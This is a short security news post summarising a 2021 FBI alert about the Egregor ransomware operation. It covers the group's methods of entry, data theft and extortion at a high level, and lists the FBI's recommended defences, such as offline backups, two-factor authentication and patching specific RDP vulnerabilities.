FBI Alert on Growing Egregor Ransomware Threat
January 11, 2021
The FBI issued a warning late last week over the growing threat from the operators behind the Egregor ransomware variant. The Egregor network claim to have compromised approximately 150 corporate networks in the U.S. and other countries with extortion demands up to $4 million.
Egregor is one of several operations that download data before locking victims out of the systems by encrypting their disks. They then extort the victim by threatening publication of the data.
- Windows machines are the target, especially those that are unpatched or running W7 or lower.
- Sadly, phishing emails with malicious attachments or links are usually the initial attack vector, reinforcing that common sense use of email is still the best frontline defense.
- Vulnerabilities Microsoft's Remote Desktop Protocol tool (RDP) and VPNs to gain initial access before moving laterally throughout the network.
- Data is exfiltrated from the targets using a combination of Rclone (or similar) renamed as the standard windows process "svc host".
- Once the data is stolen, the disks are then cryptographically locked.
Scott Fergusen in GovInfoSecurity.com reports:
"There are a couple of unusual things about Egregor," says Brett Callow, a threat analyst at security firm Emsisoft. "First, it can spit out the ransom note on any connected printer - which seems like a somewhat odd move as it often results in incidents quickly becoming public knowledge, meaning companies no longer have the incentive to pay quickly and quietly to avoid publicity. "Secondly, the group initially racked up victims at an unprecedented rate. This is probably because multiple threat actors joined Egregor's affiliate program after the Maze group ended its operation, taking with them details of compromised networks that had yet to be exploited."
FBI Recommended Mitigation
Organizations can take several steps to mitigate the risk of Egregor and other ransomware attacks, including:
- Backing up critical data offline;
- Ensuring that copies of critical data are in the cloud or on an external hard drive or storage device;
- Securing backups and ensuring data is not accessible for modification or deletion from the system where the data resides;
- Using two-factor authentication;
- Prioritizing patching of public-facing remote access products and applications, including recent RDP vulnerabilities such as CVE-2020-0609, CVE-2020-0610 and CVE-2020-16896;
- Reviewing suspicious BAT and DLL files with recon data and exfiltration tools.
License: Creative Commons Attribution 4.0 International (CC BY 4.0)